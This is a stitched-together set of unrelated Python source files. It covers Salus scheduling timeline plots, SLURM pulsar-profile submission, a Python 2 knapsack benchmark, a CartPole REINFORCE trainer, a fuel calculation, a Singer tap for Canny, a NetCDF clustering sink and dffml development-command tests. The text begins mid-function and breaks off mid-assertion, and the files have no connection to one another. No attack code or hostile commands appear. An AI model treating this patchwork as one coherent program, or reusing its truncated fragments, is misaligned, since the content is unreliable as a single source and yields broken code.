        df = cm.load_generic(f.name, event_filters=['lane_assigned'])
    df = df.drop(['evt', 'level', 'loc', 'thread', 'type'], axis=1)
    # sess handles are unique
    assert len(df.Sess.unique()) == len(df.Sess)
    # make Sess as index so we can lookup
    df = df.set_index('Sess')
    # add a new column
    df['Model'] = None
    # model name -> sess handle, recovered from the per-job client logs
    ptn = re.compile('Created session with handle (?P<sess>.+)$')
    for fpath in pathdir.glob('*.*.*.*.output'):
        with fpath.open() as f:
            for line in f:
                m = ptn.search(line)
                if m:
                    df.loc[m.group('sess'), 'Model'] = fpath.name.rstrip('.output')
    # reset index so we can use that later
    df = df.reset_index()
    return df
def refine_time_events(df, sevts):
    """Return a copy of df

    Replaces the client-side 'Started' timestamps with the server-side
    lane-assignment times from *sevts* (the old Started becomes Queued) and
    recomputes 'queuing'.  Both inputs must have exactly one row per Model.
    """
    assert df.Model.is_unique
    assert sevts.Model.is_unique
    df = df.set_index('Model').sort_index()
    sevts = sevts.set_index('Model').sort_index()
    # check sevts contains all needed info
    assert sevts.index.equals(df.index)
    # Server logs in UTC, convert to local
    sevts['Started'] = sevts.timestamp.dt.tz_localize('UTC').dt.tz_convert('US/Eastern').dt.tz_localize(None)
    sevts = sevts.drop(['timestamp'], axis=1)
    # the client-observed start is really when the job was queued server-side
    df['Queued'] = df.Started
    df = df.drop(['Started'], axis=1)
    # set Model as index for both as then and then concat
    df = pd.concat([df, sevts], axis=1)
    # update queuing
    df['queuing'] = df.Started - df.Queued
    return df.reset_index()
def plot_timeline(df, colors=None, **kwargs):
    """Draw one horizontal bar per job: grey = queuing, colored = running.

    Returns (last bar container, list of colors used) so a second timeline can
    reuse the same per-job colors.
    """
    ax = kwargs.pop('ax', None)
    if ax is None:
        ax = plt.gca()
    # sort df by no
    df['No'] = pd.to_numeric(df['Model'].str.rpartition('.')[2])
    df = df.sort_values(by='No')
    # all times plotted as seconds relative to the earliest queue event
    offset = df.Queued.min()
    qmin = (df.Queued - offset) / pd.Timedelta(1, unit='s')
    xmin = (df.Started - offset) / pd.Timedelta(1, unit='s')
    xmax = (df.Finished - offset) / pd.Timedelta(1, unit='s')
    if colors is None:
        # NOTE(review): uses the private Axes._get_lines.prop_cycler, which
        # newer matplotlib releases removed — confirm the pinned mpl version.
        color_cycle = ax._get_lines.prop_cycler
        colors = [next(color_cycle)['color'] for _ in qmin]
    for (_, row), q, left, right, color in zip(df.iterrows(), qmin, xmin, xmax, colors):
        barheight = 0.8
        # queuing time
        ax.barh(row.No, left - q, barheight, q, color='#b6b6b6')
        # run time
        bar = ax.barh(row.No, right - left, barheight, left,
                      color=color,
                      label='#{3}: {0}'.format(*row.Model.split('.')))
        if 'LaneId' in row:
            ax.text(right + 2, row.No, f'Lane {row.LaneId}',
                    ha='left', va='center', fontsize=3)
    # ax.legend()
    ax.set_xlabel('Time (s)')
    # ax.set_ylabel('Workload')
    ax.yaxis.set_ticks([])
    return bar, colors
def plot_refine(ax, df, refine_data):
    """Overlay white masks on a timeline to show which job was NOT selected
    between consecutive preempt-select events on each lane.

    Returns the list of bar containers added to *ax*.
    """
    # so that we can access job using no
    df = df.set_index('No')
    # for every preempt event pair, mask jobs that's not the left event's switch_to job
    offset = df.Queued.min()
    refine_data['Ntime'] = (refine_data['timestamp'] - offset) / pd.Timedelta(1, unit='s')
    # also convert df.Queued to relative time
    df['Started'] = (df.Started - offset) / pd.Timedelta(1, unit='s')
    df['Finished'] = (df.Finished - offset) / pd.Timedelta(1, unit='s')
    bars = []
    # group refine_data by laneId
    for laneId, grp in refine_data.groupby('LaneId'):
        # 'magic' runs one row ahead, pairing each event with its successor
        magic = grp.iterrows()
        next(magic)
        for (_, left), (_, right) in zip(grp.iterrows(), magic):
            for no in df.index.unique():
                if no == left.No:
                    continue  # the selected job stays visible
                if laneId != df.loc[no].LaneId:
                    continue  # only mask jobs on this lane
                # clip the mask to the job's own run interval
                l = max(df.loc[no].Started, left.Ntime)
                r = min(df.loc[no].Finished, right.Ntime)
                if l >= r:
                    continue
                # make sure left and right within job no's started and finished
                # mask from left to right
                bars.append(ax.barh(no, r - l, 0.5, l, color='#ffffff', edgecolor='#ffffff'))
    return bars
def plot_lanes(refined_df, **kwargs):
    """Stack-plot lane sizes over time: each lane contributes its LaneSize
    between its first Queued and last Finished timestamps."""
    lanes = refined_df.groupby(['LaneId', 'LaneSize']).agg({
        'Queued': 'first',
        'Finished': 'last'
    }).rename(columns={'Queued':'Started'}).reset_index()
    # build one time-indexed column per lane, from its start and end events
    tables = []
    for col in ['Started', 'Finished']:
        t = lanes.pivot_table(values='LaneSize', columns='LaneId', index=[col], aggfunc='first')
        tables.append(t)
    # merge start/end tables; interpolation fills each lane's active interval,
    # zeros elsewhere
    lanes2 = pd.concat(tables).sort_index().interpolate(method='linear', limit_area='inside').fillna(0)
    # x
    x = (lanes2.index - lanes2.index.min()) / pd.Timedelta(1, 's')
    # ys
    ys = [lanes2[col].tolist() for col in lanes2.columns]
    plt.stackplot(x, *ys)
def plot_jcts(df, fifo, **kwargs):
    """Plot JCT CDFs for the SRTF schedule (*df*) against the FIFO baseline."""
    srtf_secs = df.JCT.dt.total_seconds()
    fifo_secs = fifo.JCT.dt.total_seconds()
    ax = pu.cdf(srtf_secs, label='SRTF')
    ax = pu.cdf(fifo_secs, label='FIFO', ax=ax)
    ax.set_xlabel('JCT (s)')
    ax.set_ylabel('CDF')
    ax.legend()
    return ax
# Default experiment workspace root used when running this module interactively.
path = '/tmp/workspace'
def prepare_paper(path):
    """Build the FIFO-vs-Salus timeline figure for case card266 and save it
    to /tmp/workspace/card266.pdf."""
    with plt.style.context(['seaborn-paper', 'mypaper']):
        path = Path(path)/'card266'/'salus'
        df = load_case(path/'card266.output')
        fifo = load_trace(path/'trace.csv')
        refine_data = load_refine(path)
        sevts = load_serverevents(path)
        # replace client-side start times with server-side lane assignments
        df = refine_time_events(df, sevts)
        fig, axs = plt.subplots(nrows=2, sharex=True)
        fig.set_size_inches(3.25, 2.35, forward=True)
        # top panel: FIFO baseline; remember its colors so Salus matches them
        _, colors = plot_timeline(fifo, ax=axs[0], linewidth=2.5)
        axs[0].set_ylabel('FIFO')
        axs[0].legend().remove()
        axs[0].set_xlabel('')
        # bottom panel: Salus timeline with preemption masks overlaid
        plot_timeline(df.drop(['LaneId'], axis=1), ax=axs[1], linewidth=2.5, colors=colors)
        plot_refine(axs[1], df, refine_data)
        axs[1].set_ylabel('Salus')
        fig.subplots_adjust(bottom=0.35)
        axs[1].legend(loc="upper center", frameon=False,
                      bbox_to_anchor=[0.5, -0.8],
                      #bbox_transform=fig.transFigure,
                      fontsize='x-small',
                      ncol=3
                      #mode='expand'
                      )
        fig.tight_layout()
        fig.savefig('/tmp/workspace/card266.pdf', dpi=300)
|
from os.path import join
import logging
from glob import glob
from vcstools.config import load_config_file
from vcstools.job_submit import submit_slurm
from dpp.helper_files import glob_pfds
comp_config = load_config_file()
logger = logging.getLogger(__name__)
def submit_prepfold_products_db(cfg, dep_id=None, dep_type="afterany"):
    """Submits the best fold profile to the pulsar database. Will also submit .ppps

    One SLURM job is queued per bin count (all initial folds plus the best
    post-fold).  *dep_id*/*dep_type* forward SLURM dependency settings.
    Raises IndexError when an expected .ps or .bestprof file is missing.
    Returns the list of submitted job ids and marks cfg["completed"]["upload"].
    """
    my_pointing = cfg["source"]["my_pointing"]
    # We will upload the init fold and the best post fold
    bin_list = list(cfg["folds"][my_pointing]["init"].keys())
    bin_list.append(cfg["source"]["my_bins"])
    jids = []
    for bin_count in bin_list:
        commands = []
        commands.append(f"cd {cfg['files']['psr_dir']}")
        # Get the files to upload
        try:
            ppps = glob_pfds(cfg, my_pointing, bin_count, pfd_type=".ps")[0]
        except IndexError as e:
            raise IndexError(f"No ppps files found in dir: {cfg['files']['psr_dir']} for pointing {my_pointing} and bin count {bin_count}")
        try:
            bestprof = glob_pfds(cfg, my_pointing, bin_count, pfd_type=".bestprof")[0]
        except IndexError as e:
            raise IndexError(f"No bestprof files found in dir: {cfg['files']['psr_dir']} for pointing {my_pointing} and bin count {bin_count}")
        commands.append(f"echo 'Submitting profile to database with {bin_count} bins'")
        commands.append(f"submit_to_database.py -o {cfg['obs']['id']} --cal_id {cfg['obs']['cal']} -p {cfg['source']['name']} --bestprof {bestprof} --ppps {ppps}")
        # Submit this job
        name = f"Submit_db_{cfg['files']['file_precursor']}_{bin_count}"
        batch_dir = join(comp_config['base_data_dir'], cfg['obs']['id'], "batch")
        this_id = submit_slurm(name, commands,
                               batch_dir=batch_dir, slurm_kwargs={"time": "00:30:00"}, depend=dep_id,
                               module_list=[f"mwa_search/{cfg['run_ops']['mwa_search']}"],
                               vcstools_version=cfg["run_ops"]["vcstools"], submit=True, depend_type=dep_type)
        jids.append(this_id)
        logger.info(f"Submission script on queue for profile: {bestprof}")
        logger.info(f"Job Name: {name}")
        logger.info(f"Job ID: {this_id}")
    cfg["completed"]["upload"] = True
    return jids
import knapsack
import time
"""
This script is used to debug the knapsack solver in python/knapsack.py
"""
# NOTE(review): this file is Python 2 (print statements) and uses time.clock(),
# which was removed in Python 3.8; porting would need print() and
# time.perf_counter().
def main():
    """Run a series of knapsack benchmarks of increasing size and print the
    wall-clock time of each solve."""
    # setup libknapsack object
    capacity = 5
    ks = knapsack.Knapsack(capacity)
    # add items to knapsack
    ks.addItem(3,10)
    ks.addItem(1,2)
    ks.addItem(2,2)
    ks.addItem(1,3)
    # benchmark first small example
    # NOTE(review): 'ks' is reused across benchmarks, so items accumulate —
    # presumably intentional here, but the printed item counts are then only
    # approximate; confirm against the Knapsack API.
    ks.setCapacity(5);
    ks.addItem(3,10);
    ks.addItem(1,2);
    ks.addItem(2,2);
    ks.addItem(1,3);
    start = time.clock()
    result = ks.solve()
    duration_small_one = (time.clock()-start)
    print "cap: 5, items: 4. took: ", duration_small_one, " seconds."
    # benchmark second small example
    ks.setCapacity(7);
    ks.addItem(3,10)
    ks.addItem(2,1);
    start = time.clock()
    result = ks.solve()
    duration_small_two = (time.clock()-start)
    print "cap: 7, items: 6. took: ", duration_small_two, " seconds."
    # benchmark first medium example
    ks.setCapacity(89);
    ks.addItem(3,14);
    ks.addItem(2,1);
    ks.addItem(3,30);
    ks.addItem(2,14);
    ks.addItem(3,10);
    ks.addItem(5,6);
    ks.addItem(42,10);
    ks.addItem(7,23);
    ks.addItem(9,10);
    ks.addItem(1,3);
    ks.addItem(4,10);
    ks.addItem(32,7);
    ks.addItem(3,10);
    ks.addItem(1,2);
    ks.addItem(6,10);
    ks.addItem(3,54);
    ks.addItem(3,12);
    ks.addItem(5,13);
    ks.addItem(51,11);
    ks.addItem(4,42);
    ks.addItem(9,52);
    ks.addItem(24,2);
    ks.addItem(4,10);
    ks.addItem(63,17);
    start = time.clock()
    result = ks.solve()
    duration_medium_two = (time.clock()-start)
    print "cap: 89, items: 30. took: ", duration_medium_two, " seconds."
    # benchmark second medium example
    ks.setCapacity(102);
    ks.addItem(3,13);
    ks.addItem(53,10);
    ks.addItem(4,42);
    ks.addItem(23,62);
    ks.addItem(1,19);
    start = time.clock()
    result = ks.solve()
    duration_medium_two = (time.clock()-start)
    print "cap: 102, items: 35. took: ", duration_medium_two, " seconds."
    # benchmark first big example
    ks.setCapacity(130);
    ks.addItem(3,14);
    ks.addItem(2,1);
    ks.addItem(3,30);
    ks.addItem(2,12);
    ks.addItem(3,10);
    ks.addItem(5,6);
    ks.addItem(42,10);
    ks.addItem(7,24);
    ks.addItem(9,53);
    ks.addItem(6,65);
    ks.addItem(4,4);
    ks.addItem(32,12);
    ks.addItem(3,53);
    ks.addItem(2,3);
    ks.addItem(6,53);
    ks.addItem(3,2);
    ks.addItem(12,1);
    ks.addItem(5,43);
    ks.addItem(51,11);
    ks.addItem(4,53);
    ks.addItem(23,3);
    ks.addItem(24,6);
    ks.addItem(1,2);
    ks.addItem(6,10);
    ks.addItem(7,5);
    ks.addItem(41,23);
    ks.addItem(4,13);
    ks.addItem(51,11);
    ks.addItem(2,45);
    ks.addItem(9,53);
    ks.addItem(8,1);
    ks.addItem(23,13);
    ks.addItem(42,10);
    ks.addItem(7,24);
    ks.addItem(8,32);
    ks.addItem(3,65);
    ks.addItem(4,4);
    ks.addItem(2,2);
    ks.addItem(41,53);
    ks.addItem(7,33);
    ks.addItem(2,53);
    start = time.clock()
    result = ks.solve()
    duration_big_two = (time.clock()-start)
    print "cap: 130, items: 76. took: ", duration_big_two, " seconds."
    # benchmark second big example
    ks.setCapacity(150);
    ks.addItem(2,13);
    ks.addItem(53,154);
    ks.addItem(14,442);
    ks.addItem(23,2);
    ks.addItem(2,42);
    ks.addItem(53,123);
    ks.addItem(2,12);
    start = time.clock()
    result = ks.solve()
    duration_big_two = (time.clock()-start)
    print "cap: 150, items: 83. took: ", duration_big_two, " seconds."
if __name__ == "__main__":
    main()
# -*- coding: utf-8 -*-
"""Top-level package for Vehicle History Reports."""
# Package metadata consumed by packaging/documentation tooling.
__author__ = """Mpho Mphego"""
__email__ = "mpho112@gmail.com"
# Re-export the implementation module's public API at package level.
from vehicle_history_reports.vehicle_history_reports import *
import os
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
from torch.distributions import Categorical
import matplotlib.pyplot as plt
env = gym.make("CartPole-v0")
env.reset()
class Policy(nn.Module):
    """Two-layer MLP mapping a CartPole observation to per-action logits."""
    def __init__(self):
        super(Policy, self).__init__()
        # layer sizes come from the module-level gym environment's spaces
        self.num_actions = env.action_space.n
        self.state_dim = env.observation_space.shape[0]
        self.fc1 = nn.Linear(self.state_dim, 256)
        self.fc2 = nn.Linear(256, self.num_actions)
    def forward(self, x):
        # returns unnormalised logits; callers apply softmax themselves
        x = F.relu(self.fc1(x))
        x = self.fc2(x)
        return x
# Restore a previously trained policy if one was saved, else start fresh.
restore = True
# BUG FIX: the existence check probed "polict.pt" (typo) while torch.load
# read "policy.pt", so a saved model was never actually restored.
if restore and os.path.isfile("policy.pt"):
    policy = torch.load("policy.pt")
else:
    policy = Policy()
optimizer = optim.Adam(policy.parameters(), lr=0.001)
def update_policy(states, actions, rewards, log_probs, gamma=0.99):
    """
    Compute the REINFORCE loss for one episode and take a single optimizer
    step (loss, gradients, backprop, parameter update).
    """
    # Discounted returns, filled right-to-left: G[i] = r[i] + gamma * G[i+1].
    returns = rewards[:]
    for i in reversed(range(len(returns) - 1)):
        returns[i] = returns[i] + gamma * returns[i + 1]
    returns = torch.tensor(returns)
    # Policy-gradient loss: sum over steps of -log pi(a|s) * G.
    terms = [-lp * g for lp, g in zip(log_probs, returns)]
    total_loss = torch.cat(terms).sum()
    optimizer.zero_grad()
    total_loss.backward()
    optimizer.step()
def get_policy_values(state):
    """
    Run the policy network on a raw numpy observation and return its
    unnormalised action logits.
    """
    batch = torch.from_numpy(state)
    batch = Variable(batch).type(torch.FloatTensor)
    batch = batch.unsqueeze(0)  # add a batch dimension of size 1
    return policy(batch)
def generate_episode(t_max=1000):
    """
    Roll out one episode (at most t_max steps) with the current policy,
    recording states, actions, rewards and log-probabilities, then update
    the policy from them.  Returns the total undiscounted episode reward.
    """
    states, actions, rewards, log_probs = [], [], [], []
    s = env.reset()
    for t in range(t_max):
        # sample an action from the softmax over the policy's logits
        action_probs = F.softmax(get_policy_values(s), dim=-1)
        sampler = Categorical(action_probs)
        a = sampler.sample()
        log_prob = sampler.log_prob(a)
        new_s, r, done, _ = env.step(a.item())
        states.append(s)
        actions.append(a)
        rewards.append(r)
        log_probs.append(log_prob)
        s = new_s
        if done:
            break
    update_policy(states, actions, rewards, log_probs)
    return sum(rewards)
def play_episodes(num_episodes=10, render=False):
    """
    Play full episodes with the trained policy (sampling actions, no
    learning) and print each episode's total reward.
    """
    for i in range(num_episodes):
        rewards = []
        s = env.reset()
        for _ in range(1000):
            if render:
                env.render()
            action_probs = F.softmax(get_policy_values(s), dim=-1)
            sampler = Categorical(action_probs)
            a = sampler.sample()
            log_prob = sampler.log_prob(a)
            new_s, r, done, _ = env.step(a.item())
            rewards.append(r)
            s = new_s
            if done:
                print("Episode {} finished with reward {}".format(i + 1, np.sum(rewards)))
                break
def plot_rewards(rewards, running_rewards):
    """
    Plot per-episode rewards and the 100-episode running average in two
    stacked panels and save the figure to disk.
    """
    # NOTE(review): 'seaborn-darkgrid' was removed in matplotlib >= 3.6
    # (renamed 'seaborn-v0_8-darkgrid') — confirm the pinned mpl version.
    plt.style.use('seaborn-darkgrid')
    fig = plt.figure(figsize=(12, 7))
    ax1 = fig.add_subplot(2, 1, 1)
    ax2 = fig.add_subplot(2, 1, 2)
    plt.subplots_adjust(hspace=.5)
    ax1.set_title('Episodic rewards')
    ax1.plot(rewards, label='Episodic rewards')
    ax1.set_xlabel("Episodes")
    ax1.set_ylabel("Rewards")
    ax2.set_title('Running rewards')
    ax2.plot(running_rewards, label='Running rewards')
    ax2.set_xlabel("Episodes")
    ax2.set_ylabel("Average rewards")
    # NOTE(review): output name looks like a typo ('backpropagatw') — it is
    # runtime behaviour, so it is left unchanged in this doc-only pass.
    fig.savefig("backpropagatw_test.png")
if __name__ == "__main__":
    # Training loop: run episodes until CartPole-v0 is solved (average reward
    # of 195 over the last 100 episodes) or the episode budget runs out.
    num_episodes = 1500
    verbose = True
    print_every = 50
    target_avg_reward_100ep = 195
    running_reward = None
    rewards = []
    running_rewards = []
    restore_model = True
    # BUG FIX: the existence check probed "polict.pt" (typo) while torch.load
    # read "policy.pt", so a saved model was never actually restored.
    if restore_model and os.path.isfile("policy.pt"):
        policy = torch.load("policy.pt")
    else:
        policy = Policy()
    optimizer = optim.Adam(policy.parameters(), lr=0.001)
    for i in range(num_episodes):
        reward = generate_episode()
        rewards.append(reward)
        # running average over (up to) the last 100 episodes
        running_reward = np.mean(rewards[-100:])
        running_rewards.append(running_reward)
        if verbose:
            if not i % print_every:
                print("Episode: {}. Running reward: {}".format(i + 1, running_reward))
        if i >= 99 and running_reward >= target_avg_reward_100ep:
            print("Episode: {}. Running reward: {}".format(i + 1, running_reward))
            print("Ran {} episodes. Solved after {} episodes.".format(i + 1, i - 100 + 1))
            break
        elif i == num_episodes - 1:
            print("Couldn't solve after {} episodes".format(num_episodes))
    plot_rewards(rewards, running_rewards)
    torch.save(policy, "cartpole_policy_reinforce.pt")
|
#!/usr/bin/env python3
import pandas as pd
import numpy as np
#import module_mass file as a pd.DataFrame and name column
# Load the module masses as a single-column DataFrame.
# FIX: renamed the variable from 'input' — it shadowed the builtin input().
modules = pd.read_csv('input.txt', header=None)
modules.columns = ['module_mass']
# Fuel per module: floor(mass / 3) - 2.
modules['fuel'] = (modules['module_mass']/3)
modules['fuel_round'] = modules['fuel'].apply(np.floor)
modules['fuel_needed'] = modules['fuel_round']-2
# Answer: total fuel needed across all modules.
print(modules.fuel_needed.sum())
|
"""Canny tap class."""
from pathlib import Path
from typing import List
from singer_sdk import Tap, Stream
from singer_sdk.typing import (
DateTimeType,
PropertiesList,
Property,
StringType,
)
from tap_canny.streams import (
BoardsStream,
PostsStream,
StatusChangesStream,
TagsStream,
CommentsStream,
VotesStream,
ChangelogEntriesStream
)
# All stream classes this tap can sync; discover_streams() instantiates each.
STREAM_TYPES = [
    BoardsStream,
    PostsStream,
    StatusChangesStream,
    TagsStream,
    CommentsStream,
    VotesStream,
    ChangelogEntriesStream
]
class TapCanny(Tap):
    """Singer tap for the Canny feedback platform."""

    name = "tap-canny"

    # Configuration accepted by the tap: a mandatory API key and an
    # optional start date for incremental extraction.
    config_jsonschema = PropertiesList(
        Property("api_key", StringType, required=True),
        Property("start_date", DateTimeType),
    ).to_dict()

    def discover_streams(self) -> List[Stream]:
        """Instantiate one stream object per registered stream class."""
        discovered = []
        for stream_class in STREAM_TYPES:
            discovered.append(stream_class(tap=self))
        return discovered


# CLI Execution:
cli = TapCanny.cli
|
import numpy as np
import pandas as pd
from netCDF4 import Dataset
from sklearn.pipeline import Pipeline
from analysis.data import GeographicArea
from sklearn.metrics import davies_bouldin_score
class Sink:
    """Base class for persisting clustering results; also reports cluster statistics."""

    def __init__(self, pipeline: Pipeline, area: GeographicArea):
        self.pipeline = pipeline
        self.area = area

    def save(self):
        """Persist results; must be implemented by subclasses."""
        raise NotImplementedError

    def satistics(self, X, y, params):
        """Print clustering parameters; computes (currently unreported) statistics.

        X: feature matrix; y: cluster labels with -1 meaning noise.
        """
        # NOTE(review): method name is a typo for "statistics"; kept as-is
        # because external callers may depend on it.
        scaler = self.pipeline.named_steps['scaler']
        # NOTE(review): fit_transform re-fits the scaler here instead of
        # reusing the fit from the pipeline run -- confirm this is intended.
        X_ = scaler.fit_transform(X)
        total = len(X)
        noise_mask = y > -1
        # number of cluster excluding noise
        cluster = len(np.unique(y[noise_mask]))
        # NOTE(review): `noise` and `db_score` are computed but unused since
        # the summary print below is commented out.
        noise = total - len(y[noise_mask])
        if cluster > 1:
            db_score = davies_bouldin_score(X_[noise_mask, :], y[noise_mask])
        else:
            # Davies-Bouldin score is undefined for fewer than two clusters.
            db_score = np.nan
        # print("{:>10}{:>10}{:>10}{:>10}{:>10}{:>10}{:>10.5f}".format(total, self.pipeline.get_params(), noise, cluster, db_score))
        print(params)
class NetCDFSink(Sink):
    """Sink writing one 2D histogram (delD vs H2O) per cluster to a NetCDF file."""

    def __init__(self,
                 pipeline: Pipeline,
                 area: GeographicArea,
                 H2O_bins=15,
                 delD_bins=20):
        super(NetCDFSink, self).__init__(pipeline, area)
        self.H2O_bins = H2O_bins
        self.delD_bins = delD_bins

    def create_dataset(self, filename) -> Dataset:
        """Create and return a NetCDF4 file with cluster/delD/H2O dimensions."""
        nc = Dataset(filename, 'w', format='NETCDF4')
        nc.setncattr_string('lat', self.area.lat)
        nc.setncattr_string('lon', self.area.lon)
        # NOTE(review): dimension name uses "H20" (digit zero), not "H2O".
        # It is used consistently below, but easy to misread -- confirm
        # downstream consumers before renaming.
        nc.createDimension('H20_bins', self.H2O_bins)
        nc.createDimension('delD_bins', self.delD_bins)
        # unlimited number of clusters
        nc.createDimension('cluster', None)
        nc.createVariable(
            'cluster', 'u4', ('cluster', 'delD_bins', 'H20_bins'))
        return nc

    def save(self, df: pd.DataFrame, filename='cluster.nc'):
        """Write one histogram per cluster label.

        df must contain H2O, delD, and label columns with no noise (-1) labels.
        """
        assert -1 not in df.label
        with self.create_dataset(filename) as nc:
            cluster = nc['cluster']
            for group, data in df.groupby(['label']):
                hist, xedges, yedges = np.histogram2d(
                    data['H2O'].values, data['delD'].values, bins=(self.H2O_bins, self.delD_bins))
                # Transpose so axes follow the (delD_bins, H20_bins) layout
                # declared for the variable.
                cluster[group] = hist.T
|
from lightwood.encoders.categorical.categorical import CategoricalEncoder
default = CategoricalEncoder |
import io
import os
import sys
import json
import glob
import shutil
import inspect
import pathlib
import tarfile
import tempfile
import unittest
import contextlib
import dataclasses
import unittest.mock
from typing import Type, List, BinaryIO
from dffml.version import VERSION
from dffml.df.types import DataFlow
from dffml.service.dev import (
REPO_ROOT,
Develop,
RepoDirtyError,
Export,
Run,
BumpPackages,
MissingDependenciesError,
Install,
VersionNotFoundError,
RCMissingHyphen,
LintCommits,
CommitLintError,
)
from dffml.util.os import chdir
from dffml.util.skel import Skel
from dffml.util.packaging import is_develop
from dffml.util.asynctestcase import AsyncTestCase, AsyncTestCase
from ..util.test_skel import COMMON_FILES
class TestDevelopCreate(AsyncTestCase):
    """Tests for ``dev create``: scaffolding new dffml packages."""

    def verify(self, root, name, package_specific_files):
        """Assert the scaffolded package under ``root`` has the expected layout.

        ``package_specific_files`` is a list of path tuples which may contain
        the ``{import_name}`` placeholder.
        """
        import_name = name.replace("-", "_")
        # Substitute the real import name into the expected path tuples.
        package_specific_files = list(
            map(
                lambda filename: tuple(
                    map(
                        lambda x: x.replace("{import_name}", import_name),
                        filename,
                    )
                ),
                package_specific_files,
            )
        )
        # Listing of everything under root, included in assertion messages.
        all_files = ", ".join(
            map(
                lambda path: path.replace(root, ""),
                glob.glob(os.path.join(root, "**")),
            )
        )
        for dirname in [(import_name,), ("tests",)]:
            check = os.path.join(root, *dirname)
            self.assertTrue(
                os.path.isdir(check), f"Not a directory: {check}: {all_files}"
            )
        for filename in [
            ("setup.py",),
            ("LICENSE",),
            ("README.md",),
            ("MANIFEST.in",),
            (import_name, "__init__.py"),
            (import_name, "version.py"),
            ("tests", "__init__.py"),
        ] + package_specific_files:
            check = os.path.join(root, *filename)
            self.assertTrue(
                os.path.isfile(check), f"Not a file: {check}: {all_files}"
            )

    async def generic_test(self, name, package_specific_files):
        """Run ``create <name>`` both in-place ("dot") and with an explicit
        target directory ("within"), verifying the generated layout each time.
        """
        package_name = "test-package"
        # Acquire the CreateCMD class of specified type
        cli_class = getattr(Develop.create, name)
        # Create tempdir to copy files to
        with tempfile.TemporaryDirectory() as tempdir:
            # Create directories in tempdir, one we cd into and one we use as
            # target parameter
            for target in [
                os.path.join(tempdir, "dot"),
                os.path.join(tempdir, "within"),
            ]:
                with self.subTest(target=target):
                    # Create the directory within the tempdir
                    os.mkdir(target)
                    # Instantiate an instance of the CreateCMD class
                    # NOTE(review): ("dot") is a plain string, not a tuple, so
                    # this reversed startswith is equivalent to
                    # target.endswith("dot").
                    cli = cli_class(
                        package=package_name,
                        description=None,
                        target=target
                        if target[::-1].startswith(("dot")[::-1])
                        else None,
                    )
                    # Change directories
                    with chdir(target):
                        # Call create command
                        await cli.run()
                    # Verify that all went as planned
                    if target[::-1].startswith(("dot")[::-1]):
                        self.verify(
                            target, package_name, package_specific_files
                        )
                    elif target[::-1].startswith(("within")[::-1]):
                        self.verify(
                            os.path.join(target, package_name),
                            package_name,
                            package_specific_files,
                        )
                    else:  # pragma: no cov
                        pass

    async def test_model(self):
        """Model scaffold includes the example model and its test."""
        await self.generic_test(
            "model",
            [("{import_name}", "myslr.py"), ("tests", "test_model.py")],
        )

    async def test_operations(self):
        """Operations scaffold includes definitions, operations, and tests."""
        await self.generic_test(
            "operations",
            [
                ("{import_name}", "definitions.py"),
                ("{import_name}", "operations.py"),
                ("tests", "test_operations.py"),
            ],
        )

    async def test_service(self):
        """Service scaffold includes the misc service module and its test."""
        await self.generic_test(
            "service",
            [("{import_name}", "misc.py"), ("tests", "test_service.py")],
        )
class TestDevelopSkelLink(AsyncTestCase):
    """Tests for ``dev skel link``: symlinking common skeleton files into plugins."""

    skel = Skel()

    async def test_run(self):
        """After linking, every plugin must hold symlinks for all common files."""
        # Skip if not in development mode
        if not is_develop("dffml"):
            self.skipTest("dffml not installed in development mode")
        await Develop.cli("skel", "link")
        # NOTE(review): `common_files` is computed but never used below;
        # COMMON_FILES (imported) is checked instead -- confirm intended.
        common_files = [
            path.relative_to(self.skel.common)
            for path in self.skel.common_files()
        ]
        # At time of writing there are 4 plugins in skel/ change this as needed
        plugins = self.skel.plugins()
        self.assertGreater(len(plugins), 3)
        for plugin in plugins:
            for check in COMMON_FILES:
                with chdir(plugin):
                    self.assertTrue(
                        check.is_symlink(),
                        f"{check.resolve()} is not a symlink",
                    )
@dataclasses.dataclass
class FakeProcess:
    """In-memory stand-in for an asyncio subprocess, used to stub
    ``asyncio.create_subprocess_exec`` in tests."""

    cmd: List[str] = None
    returncode: int = 0
    stdout: BinaryIO = None

    def __post_init__(self):
        # Normalize a missing command list to an empty one.
        self.cmd = [] if self.cmd is None else self.cmd

    async def communicate(self):
        """Pretend the process produced no output on either stream."""
        return b"", b""

    async def wait(self):
        """If the fake command was an archive, stream a small tarball to stdout."""
        if "archive" not in self.cmd:
            return
        with contextlib.ExitStack() as resources:
            # In-memory buffers for the archive and its single member file.
            archive_buffer = resources.enter_context(io.BytesIO())
            member_data = resources.enter_context(io.BytesIO(b"world"))
            # Describe the one member: somedir/hello.txt containing b"world".
            member_info = tarfile.TarInfo(name="somedir/hello.txt")
            member_info.size = len(member_data.getvalue())
            # Assemble the archive in streaming write mode.
            with tarfile.open(mode="w|", fileobj=archive_buffer) as tar:
                tar.addfile(member_info, fileobj=member_data)
            # Deliver the finished tar bytes to the client's stdout stream.
            self.stdout.write(archive_buffer.getvalue())
def mkexec(proc_cls: Type[FakeProcess] = FakeProcess):
    """Return a drop-in replacement for asyncio.create_subprocess_exec that
    produces ``proc_cls`` instances instead of real processes."""

    async def fake_create_subprocess_exec(*args, stdin=None, stdout=None, stderr=None):
        # Hand the requested command line and stdout target to the fake.
        return proc_cls(cmd=args, stdout=stdout)

    return fake_create_subprocess_exec
class FakeResponse:
    """Minimal urllib response stub reporting the current dffml version as PyPi JSON."""

    def read(self, num=0):
        payload = {"info": {"version": VERSION}}
        return json.dumps(payload).encode()
@contextlib.contextmanager
def fake_urlopen(url):
    """Context-manager stand-in for urllib.request.urlopen; the URL is ignored."""
    response = FakeResponse()
    yield response
class TestRelease(AsyncTestCase):
    """Tests for the ``dev release`` command."""

    async def setUp(self):
        await super().setUp()
        # Release commands must run from the repository root.
        self._stack.enter_context(chdir(REPO_ROOT))

    async def test_uncommited_changes(self):
        """A dirty working tree must abort the release with RepoDirtyError."""

        class FailedFakeProcess(FakeProcess):
            # Simulate `git status`-style output indicating local changes.
            async def communicate(self):
                return b"There are changes", b""

        with unittest.mock.patch(
            "asyncio.create_subprocess_exec", new=mkexec(FailedFakeProcess)
        ):
            with self.assertRaises(RepoDirtyError):
                await Develop.cli("release", ".")

    async def test_already_on_pypi(self):
        """If PyPi already has this version, nothing is built or uploaded."""
        stdout = io.StringIO()
        with unittest.mock.patch(
            "asyncio.create_subprocess_exec", new=mkexec()
        ), unittest.mock.patch(
            "urllib.request.urlopen", new=fake_urlopen
        ), contextlib.redirect_stdout(
            stdout
        ):
            await Develop.cli("release", ".")
        self.assertEqual(
            stdout.getvalue().strip(),
